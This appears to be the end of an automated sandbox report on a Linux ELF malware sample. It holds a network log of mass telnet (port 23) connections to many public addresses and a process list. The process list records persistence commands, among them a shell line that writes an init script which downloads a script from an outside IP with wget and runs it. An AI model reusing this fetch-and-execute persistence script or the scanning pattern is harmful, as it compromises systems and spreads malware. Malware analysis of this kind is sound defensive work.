                                              Dec 13, 2024 06:12:51.236890078 CET2354438204.70.68.113192.168.2.23
                                              Dec 13, 2024 06:12:51.236911058 CET4491023192.168.2.2320.123.62.35
                                              Dec 13, 2024 06:12:51.236912966 CET235813042.104.77.111192.168.2.23
                                              Dec 13, 2024 06:12:51.236915112 CET4379823192.168.2.2395.205.180.161
                                              Dec 13, 2024 06:12:51.236915112 CET5443823192.168.2.23204.70.68.113
                                              Dec 13, 2024 06:12:51.236926079 CET2352336135.182.78.52192.168.2.23
                                              Dec 13, 2024 06:12:51.236943960 CET2334346211.57.202.170192.168.2.23
                                              Dec 13, 2024 06:12:51.236944914 CET5813023192.168.2.2342.104.77.111
                                              Dec 13, 2024 06:12:51.236955881 CET5233623192.168.2.23135.182.78.52
                                              Dec 13, 2024 06:12:51.236968040 CET2344754151.184.50.171192.168.2.23
                                              Dec 13, 2024 06:12:51.236970901 CET3434623192.168.2.23211.57.202.170
                                              Dec 13, 2024 06:12:51.236979961 CET2347486210.18.131.23192.168.2.23
                                              Dec 13, 2024 06:12:51.236995935 CET4475423192.168.2.23151.184.50.171
                                              Dec 13, 2024 06:12:51.237013102 CET4748623192.168.2.23210.18.131.23
                                              Dec 13, 2024 06:12:51.237078905 CET2354878182.210.48.93192.168.2.23
                                              Dec 13, 2024 06:12:51.237092972 CET234158648.32.125.231192.168.2.23
                                              Dec 13, 2024 06:12:51.237104893 CET234820820.170.50.65192.168.2.23
                                              Dec 13, 2024 06:12:51.237113953 CET5487823192.168.2.23182.210.48.93
                                              Dec 13, 2024 06:12:51.237117052 CET2335778164.102.19.239192.168.2.23
                                              Dec 13, 2024 06:12:51.237128973 CET4158623192.168.2.2348.32.125.231
                                              Dec 13, 2024 06:12:51.237128973 CET4820823192.168.2.2320.170.50.65
                                              Dec 13, 2024 06:12:51.237149954 CET3577823192.168.2.23164.102.19.239
                                              Dec 13, 2024 06:12:51.237462044 CET2356364181.156.76.254192.168.2.23
                                              Dec 13, 2024 06:12:51.237487078 CET2356196197.3.136.62192.168.2.23
                                              Dec 13, 2024 06:12:51.237495899 CET5636423192.168.2.23181.156.76.254
                                              Dec 13, 2024 06:12:51.237523079 CET2335470158.147.31.168192.168.2.23
                                              Dec 13, 2024 06:12:51.237524986 CET5619623192.168.2.23197.3.136.62
                                              Dec 13, 2024 06:12:51.237535954 CET23542609.148.99.252192.168.2.23
                                              Dec 13, 2024 06:12:51.237550974 CET2342590108.93.54.90192.168.2.23
                                              Dec 13, 2024 06:12:51.237554073 CET3547023192.168.2.23158.147.31.168
                                              Dec 13, 2024 06:12:51.237571955 CET5426023192.168.2.239.148.99.252
                                              Dec 13, 2024 06:12:51.237576008 CET2353394166.236.161.173192.168.2.23
                                              Dec 13, 2024 06:12:51.237584114 CET4259023192.168.2.23108.93.54.90
                                              Dec 13, 2024 06:12:51.237617016 CET5339423192.168.2.23166.236.161.173
                                              Dec 13, 2024 06:12:51.237627029 CET2333844121.17.55.106192.168.2.23
                                              Dec 13, 2024 06:12:51.237649918 CET23596365.234.109.63192.168.2.23
                                              Dec 13, 2024 06:12:51.237658978 CET3384423192.168.2.23121.17.55.106
                                              Dec 13, 2024 06:12:51.237662077 CET2348160120.28.143.116192.168.2.23
                                              Dec 13, 2024 06:12:51.237679005 CET235903274.145.206.10192.168.2.23
                                              Dec 13, 2024 06:12:51.237688065 CET5963623192.168.2.235.234.109.63
                                              Dec 13, 2024 06:12:51.237689972 CET4816023192.168.2.23120.28.143.116
                                              Dec 13, 2024 06:12:51.237705946 CET2343832113.139.190.52192.168.2.23
                                              Dec 13, 2024 06:12:51.237720013 CET5903223192.168.2.2374.145.206.10
                                              Dec 13, 2024 06:12:51.237737894 CET4383223192.168.2.23113.139.190.52
                                              Dec 13, 2024 06:12:51.237751007 CET2347260176.162.235.243192.168.2.23
                                              Dec 13, 2024 06:12:51.237763882 CET235851019.209.69.30192.168.2.23
                                              Dec 13, 2024 06:12:51.237782955 CET4726023192.168.2.23176.162.235.243
                                              Dec 13, 2024 06:12:51.237796068 CET5851023192.168.2.2319.209.69.30
                                              Dec 13, 2024 06:12:51.237803936 CET2357744128.152.183.133192.168.2.23
                                              Dec 13, 2024 06:12:51.237819910 CET234531012.37.32.87192.168.2.23
                                              Dec 13, 2024 06:12:51.237838030 CET5774423192.168.2.23128.152.183.133
                                              Dec 13, 2024 06:12:51.237843990 CET234833227.245.32.159192.168.2.23
                                              Dec 13, 2024 06:12:51.237855911 CET233713896.141.151.79192.168.2.23
                                              Dec 13, 2024 06:12:51.237857103 CET4531023192.168.2.2312.37.32.87
                                              Dec 13, 2024 06:12:51.237869978 CET4833223192.168.2.2327.245.32.159
                                              Dec 13, 2024 06:12:51.237879992 CET2334470147.134.142.201192.168.2.23
                                              Dec 13, 2024 06:12:51.237886906 CET3713823192.168.2.2396.141.151.79
                                              Dec 13, 2024 06:12:51.237893105 CET2342630136.244.253.87192.168.2.23
                                              Dec 13, 2024 06:12:51.237905979 CET2337604170.40.149.45192.168.2.23
                                              Dec 13, 2024 06:12:51.237910986 CET3447023192.168.2.23147.134.142.201
                                              Dec 13, 2024 06:12:51.237921953 CET4263023192.168.2.23136.244.253.87
                                              Dec 13, 2024 06:12:51.237936020 CET3760423192.168.2.23170.40.149.45
                                              Dec 13, 2024 06:12:51.237941980 CET233966480.254.57.177192.168.2.23
                                              Dec 13, 2024 06:12:51.237955093 CET234193297.95.69.226192.168.2.23
                                              Dec 13, 2024 06:12:51.237974882 CET3966423192.168.2.2380.254.57.177
                                              Dec 13, 2024 06:12:51.237988949 CET4193223192.168.2.2397.95.69.226
                                              Dec 13, 2024 06:12:51.238406897 CET235276258.166.79.121192.168.2.23
                                              Dec 13, 2024 06:12:51.238430977 CET234428637.20.160.128192.168.2.23
                                              Dec 13, 2024 06:12:51.238439083 CET5276223192.168.2.2358.166.79.121
                                              Dec 13, 2024 06:12:51.238470078 CET4428623192.168.2.2337.20.160.128
                                              Dec 13, 2024 06:12:51.238511086 CET2354200209.178.101.205192.168.2.23
                                              Dec 13, 2024 06:12:51.238523960 CET2349436177.144.171.0192.168.2.23
                                              Dec 13, 2024 06:12:51.238537073 CET23458767.140.21.201192.168.2.23
                                              Dec 13, 2024 06:12:51.238542080 CET5420023192.168.2.23209.178.101.205
                                              Dec 13, 2024 06:12:51.238557100 CET4943623192.168.2.23177.144.171.0
                                              Dec 13, 2024 06:12:51.238560915 CET2332802108.246.54.50192.168.2.23
                                              Dec 13, 2024 06:12:51.238567114 CET4587623192.168.2.237.140.21.201
                                              Dec 13, 2024 06:12:51.238574982 CET2358852170.87.216.164192.168.2.23
                                              Dec 13, 2024 06:12:51.238588095 CET2342582136.128.109.130192.168.2.23
                                              Dec 13, 2024 06:12:51.238590002 CET3280223192.168.2.23108.246.54.50
                                              Dec 13, 2024 06:12:51.238603115 CET5885223192.168.2.23170.87.216.164
                                              Dec 13, 2024 06:12:51.238620996 CET4258223192.168.2.23136.128.109.130
                                              Dec 13, 2024 06:12:51.238636017 CET2337100162.234.134.114192.168.2.23
                                              Dec 13, 2024 06:12:51.238648891 CET2356180116.189.192.151192.168.2.23
                                              Dec 13, 2024 06:12:51.238661051 CET2342416121.121.9.246192.168.2.23
                                              Dec 13, 2024 06:12:51.238679886 CET5618023192.168.2.23116.189.192.151
                                              Dec 13, 2024 06:12:51.238686085 CET3710023192.168.2.23162.234.134.114
                                              Dec 13, 2024 06:12:51.238693953 CET4241623192.168.2.23121.121.9.246
                                              Dec 13, 2024 06:12:51.238698006 CET2339750184.147.115.52192.168.2.23
                                              Dec 13, 2024 06:12:51.238711119 CET235158413.137.0.129192.168.2.23
                                              Dec 13, 2024 06:12:51.238733053 CET234370299.252.105.0192.168.2.23
                                              Dec 13, 2024 06:12:51.238739014 CET3975023192.168.2.23184.147.115.52
                                              Dec 13, 2024 06:12:51.238744974 CET235612418.141.138.35192.168.2.23
                                              Dec 13, 2024 06:12:51.238753080 CET5158423192.168.2.2313.137.0.129
                                              Dec 13, 2024 06:12:51.238764048 CET4370223192.168.2.2399.252.105.0
                                              Dec 13, 2024 06:12:51.238775015 CET5612423192.168.2.2318.141.138.35
                                              Dec 13, 2024 06:12:51.238794088 CET2351526167.33.19.199192.168.2.23
                                              Dec 13, 2024 06:12:51.238806963 CET233931432.149.5.216192.168.2.23
                                              Dec 13, 2024 06:12:51.238818884 CET2336038151.159.234.216192.168.2.23
                                              Dec 13, 2024 06:12:51.238826036 CET5152623192.168.2.23167.33.19.199
                                              Dec 13, 2024 06:12:51.238837004 CET3931423192.168.2.2332.149.5.216
                                              Dec 13, 2024 06:12:51.238850117 CET3603823192.168.2.23151.159.234.216
                                              Dec 13, 2024 06:12:51.238886118 CET2351080208.46.97.148192.168.2.23
                                              Dec 13, 2024 06:12:51.238899946 CET234211057.215.48.129192.168.2.23
                                              Dec 13, 2024 06:12:51.238910913 CET233737248.252.209.208192.168.2.23
                                              Dec 13, 2024 06:12:51.238915920 CET5108023192.168.2.23208.46.97.148
                                              Dec 13, 2024 06:12:51.238924026 CET2352084214.21.154.124192.168.2.23
                                              Dec 13, 2024 06:12:51.238930941 CET4211023192.168.2.2357.215.48.129
                                              Dec 13, 2024 06:12:51.238938093 CET3737223192.168.2.2348.252.209.208
                                              Dec 13, 2024 06:12:51.238954067 CET5208423192.168.2.23214.21.154.124
                                              Dec 13, 2024 06:12:51.239386082 CET235789449.114.23.148192.168.2.23
                                              Dec 13, 2024 06:12:51.239398956 CET2352864155.96.178.156192.168.2.23
                                              Dec 13, 2024 06:12:51.239420891 CET5789423192.168.2.2349.114.23.148
                                              Dec 13, 2024 06:12:51.239424944 CET2338132188.20.192.210192.168.2.23
                                              Dec 13, 2024 06:12:51.239434004 CET5286423192.168.2.23155.96.178.156
                                              Dec 13, 2024 06:12:51.239439964 CET2336628173.100.238.188192.168.2.23
                                              Dec 13, 2024 06:12:51.239451885 CET235476447.140.136.151192.168.2.23
                                              Dec 13, 2024 06:12:51.239461899 CET3813223192.168.2.23188.20.192.210
                                              Dec 13, 2024 06:12:51.239464998 CET2343768170.71.189.255192.168.2.23
                                              Dec 13, 2024 06:12:51.239475012 CET3662823192.168.2.23173.100.238.188
                                              Dec 13, 2024 06:12:51.239475965 CET5476423192.168.2.2347.140.136.151
                                              Dec 13, 2024 06:12:51.239495993 CET4376823192.168.2.23170.71.189.255
                                              Dec 13, 2024 06:12:51.239502907 CET2334496154.245.108.99192.168.2.23
                                              Dec 13, 2024 06:12:51.239515066 CET2352086209.166.179.154192.168.2.23
                                              Dec 13, 2024 06:12:51.239527941 CET2360638131.247.41.21192.168.2.23
                                              Dec 13, 2024 06:12:51.239537954 CET3449623192.168.2.23154.245.108.99
                                              Dec 13, 2024 06:12:51.239546061 CET5208623192.168.2.23209.166.179.154
                                              Dec 13, 2024 06:12:51.239552975 CET2353716215.26.126.186192.168.2.23
                                              Dec 13, 2024 06:12:51.239559889 CET6063823192.168.2.23131.247.41.21
                                              Dec 13, 2024 06:12:51.239567041 CET233525855.118.20.64192.168.2.23
                                              Dec 13, 2024 06:12:51.239579916 CET2333006199.105.9.253192.168.2.23
                                              Dec 13, 2024 06:12:51.239587069 CET5371623192.168.2.23215.26.126.186
                                              Dec 13, 2024 06:12:51.239597082 CET3525823192.168.2.2355.118.20.64
                                              Dec 13, 2024 06:12:51.239612103 CET3300623192.168.2.23199.105.9.253
                                              Dec 13, 2024 06:12:51.239618063 CET233565220.150.35.74192.168.2.23
                                              Dec 13, 2024 06:12:51.239630938 CET2334046129.174.225.17192.168.2.23
                                              Dec 13, 2024 06:12:51.239641905 CET235589283.93.88.207192.168.2.23
                                              Dec 13, 2024 06:12:51.239643097 CET3565223192.168.2.2320.150.35.74
                                              Dec 13, 2024 06:12:51.239659071 CET3404623192.168.2.23129.174.225.17
                                              Dec 13, 2024 06:12:51.239667892 CET2354798144.144.38.154192.168.2.23
                                              Dec 13, 2024 06:12:51.239672899 CET5589223192.168.2.2383.93.88.207
                                              Dec 13, 2024 06:12:51.239681959 CET2336446135.141.226.183192.168.2.23
                                              Dec 13, 2024 06:12:51.239696026 CET234494283.122.188.192192.168.2.23
                                              Dec 13, 2024 06:12:51.239703894 CET5479823192.168.2.23144.144.38.154
                                              Dec 13, 2024 06:12:51.239708900 CET3644623192.168.2.23135.141.226.183
                                              Dec 13, 2024 06:12:51.239723921 CET4494223192.168.2.2383.122.188.192
                                              Dec 13, 2024 06:12:51.239726067 CET2351068197.254.172.29192.168.2.23
                                              Dec 13, 2024 06:12:51.239738941 CET234973623.44.156.92192.168.2.23
                                              Dec 13, 2024 06:12:51.239756107 CET5106823192.168.2.23197.254.172.29
                                              Dec 13, 2024 06:12:51.239774942 CET4973623192.168.2.2323.44.156.92
                                              Dec 13, 2024 06:12:51.239815950 CET2357724150.19.88.194192.168.2.23
                                              Dec 13, 2024 06:12:51.239829063 CET2351542186.153.74.207192.168.2.23
                                              Dec 13, 2024 06:12:51.239845037 CET5772423192.168.2.23150.19.88.194
                                              Dec 13, 2024 06:12:51.239852905 CET5154223192.168.2.23186.153.74.207
                                              Dec 13, 2024 06:12:51.240228891 CET235674412.183.127.192192.168.2.23
                                              Dec 13, 2024 06:12:51.240253925 CET233508090.65.231.64192.168.2.23
                                              Dec 13, 2024 06:12:51.240269899 CET2354596194.141.229.184192.168.2.23
                                              Dec 13, 2024 06:12:51.240272045 CET5674423192.168.2.2312.183.127.192
                                              Dec 13, 2024 06:12:51.240283012 CET3508023192.168.2.2390.65.231.64
                                              Dec 13, 2024 06:12:51.240294933 CET5459623192.168.2.23194.141.229.184
                                              Dec 13, 2024 06:12:51.240423918 CET2360204110.174.129.4192.168.2.23
                                              Dec 13, 2024 06:12:51.240438938 CET235650820.181.64.64192.168.2.23
                                              Dec 13, 2024 06:12:51.240451097 CET233758465.255.177.227192.168.2.23
                                              Dec 13, 2024 06:12:51.240459919 CET6020423192.168.2.23110.174.129.4
                                              Dec 13, 2024 06:12:51.240468025 CET5650823192.168.2.2320.181.64.64
                                              Dec 13, 2024 06:12:51.240473986 CET236081692.100.78.69192.168.2.23
                                              Dec 13, 2024 06:12:51.240483046 CET3758423192.168.2.2365.255.177.227
                                              Dec 13, 2024 06:12:51.240487099 CET2343824210.161.180.248192.168.2.23
                                              Dec 13, 2024 06:12:51.240499973 CET2336926190.176.34.26192.168.2.23
                                              Dec 13, 2024 06:12:51.240508080 CET4382423192.168.2.23210.161.180.248
                                              Dec 13, 2024 06:12:51.240513086 CET6081623192.168.2.2392.100.78.69
                                              Dec 13, 2024 06:12:51.240524054 CET2353172146.230.119.134192.168.2.23
                                              Dec 13, 2024 06:12:51.240531921 CET3692623192.168.2.23190.176.34.26
                                              Dec 13, 2024 06:12:51.240536928 CET2347222167.3.212.100192.168.2.23
                                              Dec 13, 2024 06:12:51.240557909 CET5317223192.168.2.23146.230.119.134
                                              Dec 13, 2024 06:12:51.240560055 CET236075493.83.42.9192.168.2.23
                                              Dec 13, 2024 06:12:51.240571022 CET4722223192.168.2.23167.3.212.100
                                              Dec 13, 2024 06:12:51.240575075 CET2349188115.230.198.252192.168.2.23
                                              Dec 13, 2024 06:12:51.240592957 CET6075423192.168.2.2393.83.42.9
                                              Dec 13, 2024 06:12:51.240600109 CET2352354104.201.118.203192.168.2.23
                                              Dec 13, 2024 06:12:51.240602970 CET4918823192.168.2.23115.230.198.252
                                              Dec 13, 2024 06:12:51.240612984 CET235208418.165.52.22192.168.2.23
                                              Dec 13, 2024 06:12:51.240631104 CET5235423192.168.2.23104.201.118.203
                                              Dec 13, 2024 06:12:51.240647078 CET5208423192.168.2.2318.165.52.22
                                              Dec 13, 2024 06:12:51.240652084 CET2342794206.169.158.187192.168.2.23
                                              Dec 13, 2024 06:12:51.240664959 CET2360262187.236.67.106192.168.2.23
                                              Dec 13, 2024 06:12:51.240678072 CET2332778124.13.239.113192.168.2.23
                                              Dec 13, 2024 06:12:51.240683079 CET4279423192.168.2.23206.169.158.187
                                              Dec 13, 2024 06:12:51.240695000 CET6026223192.168.2.23187.236.67.106
                                              Dec 13, 2024 06:12:51.240710020 CET3277823192.168.2.23124.13.239.113
                                              Dec 13, 2024 06:12:51.240751028 CET233996466.2.221.184192.168.2.23
                                              Dec 13, 2024 06:12:51.240763903 CET233807229.221.57.132192.168.2.23
                                              Dec 13, 2024 06:12:51.240776062 CET235661814.230.224.164192.168.2.23
                                              Dec 13, 2024 06:12:51.240787029 CET3996423192.168.2.2366.2.221.184
                                              Dec 13, 2024 06:12:51.240787983 CET2335826165.254.101.96192.168.2.23
                                              Dec 13, 2024 06:12:51.240799904 CET5661823192.168.2.2314.230.224.164
                                              Dec 13, 2024 06:12:51.240801096 CET3807223192.168.2.2329.221.57.132
                                              Dec 13, 2024 06:12:51.240817070 CET3582623192.168.2.23165.254.101.96
                                              Dec 13, 2024 06:12:51.241144896 CET2356664171.207.250.0192.168.2.23
                                              Dec 13, 2024 06:12:51.241178036 CET5666423192.168.2.23171.207.250.0
                                              Dec 13, 2024 06:12:51.241208076 CET2335202155.102.83.3192.168.2.23
                                              Dec 13, 2024 06:12:51.241225958 CET233929244.89.67.209192.168.2.23
                                              Dec 13, 2024 06:12:51.241242886 CET3520223192.168.2.23155.102.83.3
                                              Dec 13, 2024 06:12:51.241257906 CET234818868.22.126.112192.168.2.23
                                              Dec 13, 2024 06:12:51.241259098 CET3929223192.168.2.2344.89.67.209
                                              Dec 13, 2024 06:12:51.241271973 CET2335140125.15.165.162192.168.2.23
                                              Dec 13, 2024 06:12:51.241295099 CET4818823192.168.2.2368.22.126.112
                                              Dec 13, 2024 06:12:51.241295099 CET3514023192.168.2.23125.15.165.162
                                              Dec 13, 2024 06:12:51.241306067 CET23473561.129.195.20192.168.2.23
                                              Dec 13, 2024 06:12:51.241318941 CET234410890.250.123.174192.168.2.23
                                              Dec 13, 2024 06:12:51.241339922 CET4735623192.168.2.231.129.195.20
                                              Dec 13, 2024 06:12:51.241349936 CET236076613.222.71.194192.168.2.23
                                              Dec 13, 2024 06:12:51.241374016 CET4410823192.168.2.2390.250.123.174
                                              Dec 13, 2024 06:12:51.241381884 CET6076623192.168.2.2313.222.71.194
                                              Dec 13, 2024 06:12:51.241403103 CET2351154171.93.113.244192.168.2.23
                                              Dec 13, 2024 06:12:51.241415977 CET2335092214.57.89.89192.168.2.23
                                              Dec 13, 2024 06:12:51.241426945 CET2359702117.171.239.5192.168.2.23
                                              Dec 13, 2024 06:12:51.241444111 CET5115423192.168.2.23171.93.113.244
                                              Dec 13, 2024 06:12:51.241446972 CET3509223192.168.2.23214.57.89.89
                                              Dec 13, 2024 06:12:51.241450071 CET2355886188.208.242.159192.168.2.23
                                              Dec 13, 2024 06:12:51.241456985 CET5970223192.168.2.23117.171.239.5
                                              Dec 13, 2024 06:12:51.241476059 CET2353944187.147.70.244192.168.2.23
                                              Dec 13, 2024 06:12:51.241482973 CET5588623192.168.2.23188.208.242.159
                                              Dec 13, 2024 06:12:51.241491079 CET233967481.207.120.143192.168.2.23
                                              Dec 13, 2024 06:12:51.241511106 CET5394423192.168.2.23187.147.70.244
                                              Dec 13, 2024 06:12:51.241514921 CET3967423192.168.2.2381.207.120.143
                                              Dec 13, 2024 06:12:51.246609926 CET382426040894.156.227.234192.168.2.23
                                              Dec 13, 2024 06:12:51.246656895 CET6040838242192.168.2.2394.156.227.234
                                              Dec 13, 2024 06:12:56.545077085 CET42836443192.168.2.2391.189.91.43
                                              Dec 13, 2024 06:12:57.824904919 CET4251680192.168.2.23109.202.202.202
                                              Dec 13, 2024 06:13:12.670881987 CET43928443192.168.2.2391.189.91.42
                                              Dec 13, 2024 06:13:22.909468889 CET42836443192.168.2.2391.189.91.43
                                              Dec 13, 2024 06:13:29.052706003 CET4251680192.168.2.23109.202.202.202
                                              Dec 13, 2024 06:13:53.625268936 CET43928443192.168.2.2391.189.91.42

                                              System Behavior

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:/tmp/x86_32.nn.elf
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl enable custom.service
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/bin/chmod
                                              Arguments:chmod +x /etc/init.d/system
                                              File size:63864 bytes
                                              MD5 hash:739483b900c045ae1374d6f53a86a279

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/bin/ln
                                              Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                              File size:76160 bytes
                                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/bin/chmod
                                              Arguments:chmod +x /etc/init.d/sh
                                              File size:63864 bytes
                                              MD5 hash:739483b900c045ae1374d6f53a86a279

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/bin/mkdir
                                              Arguments:mkdir -p /etc/rc.d
                                              File size:88408 bytes
                                              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/bin/ln
                                              Arguments:ln -s /etc/init.d/sh /etc/rc.d/S99sh
                                              File size:76160 bytes
                                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/tmp/x86_32.nn.elf
                                              Arguments:-
                                              File size:95984 bytes
                                              MD5 hash:b6c87b436d8de600e1f8c7978a098739

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):05:12:49
                                              Start date (UTC):13/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
